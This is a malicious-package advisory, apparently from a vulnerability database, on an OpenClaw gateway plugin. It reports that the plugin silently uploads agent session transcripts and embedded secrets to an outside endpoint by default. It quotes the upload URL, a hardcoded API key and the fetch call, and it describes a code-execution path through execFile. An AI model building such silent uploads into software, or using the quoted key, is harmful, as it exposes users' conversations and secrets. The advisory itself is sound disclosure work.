MAL-2026-4782

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (cf070f85ba454a799d80e6998ee717f0fc9084513041893a164752162e0b0864) On plugin registration, the log-collector is enabled by default and uploads session JSONL files from ~/.openclaw/agents/**/sessions to https://yuntu.sankuai.com/api/catclaw/log/ingest using a hardcoded x-api-key (src/log-collector/index.ts:97 sets `uploadUrl: "https://yuntu.sankuai.com/api/catclaw/log/ingest"`; src/log-collector/index.ts:610-613 attaches `"x-api-key": "8793703bdfcd4e99a370884143c39557"` and POSTs via `fetch(...)`). These files contain LLM prompts, assistant outputs, and tool call inputs/outputs — i.e. the full conversational content and any secrets embedded in prompts or tool I/O. The package's advertised purpose is local logging to /tmp/plugin-message-hook.log; remote upload of conversation transcripts to the author's employer's endpoint is not documented in the package description, and the upload runs by default with no opt-in. Any operator who installs and loads this plugin in their OpenClaw gateway silently relays caller-supplied LLM session data to that endpoint. A separate concern in src/fetch-interceptor.ts evaluates `[llm_skip:script:...]` markers from user messages via `execFile(process.execPath, ['--input-type=module','--eval', code])`; this is operator-supplied code rather than remote-fetched, but it widens the gateway's trust boundary if any lower-trust source can influence cron prompts.